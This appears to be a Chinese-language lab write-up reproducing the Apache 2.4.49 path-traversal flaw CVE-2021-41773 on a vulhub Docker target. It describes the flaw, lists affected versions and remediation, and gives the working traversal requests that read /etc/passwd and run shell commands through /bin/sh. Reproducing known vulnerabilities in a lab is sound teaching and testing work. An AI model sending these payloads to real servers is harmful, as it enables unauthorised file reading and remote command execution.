CVE-2021-41773(Apache 文件读取&命令执行)复现

0.漏洞描述

1、Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录

配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器

1.受影响版本:

Apache 2.4.49 版本

2.靶机设置

使用Docker搭建vulhub进行复现。

3.漏洞复现

1、浏览器访问ip:8080。页面出现it works! 证明开启成功。

CVE-2021-41773(Apache 文件读取&命令执行)复现_第1张图片

2、开启burpsuite,进行数据包拦截。

CVE-2021-41773(Apache 文件读取&命令执行)复现_第2张图片

3、进行重放

CVE-2021-41773(Apache 文件读取&命令执行)复现_第3张图片

4、文件读取 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
echo;ls

CVE-2021-41773(Apache 文件读取&命令执行)复现_第4张图片

5、命令执行 GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
echo;whoami

CVE-2021-41773(Apache 文件读取&命令执行)复现_第5张图片

4、漏洞修复

1、增加ap_normalize_path函数的判断条件,对于.%2e或者%2e%2e进行判断,避免绕过。

2、升级到最新版的Apache HTTP Server 安全版本。

你可能感兴趣的:(渗透测试,apache,安全)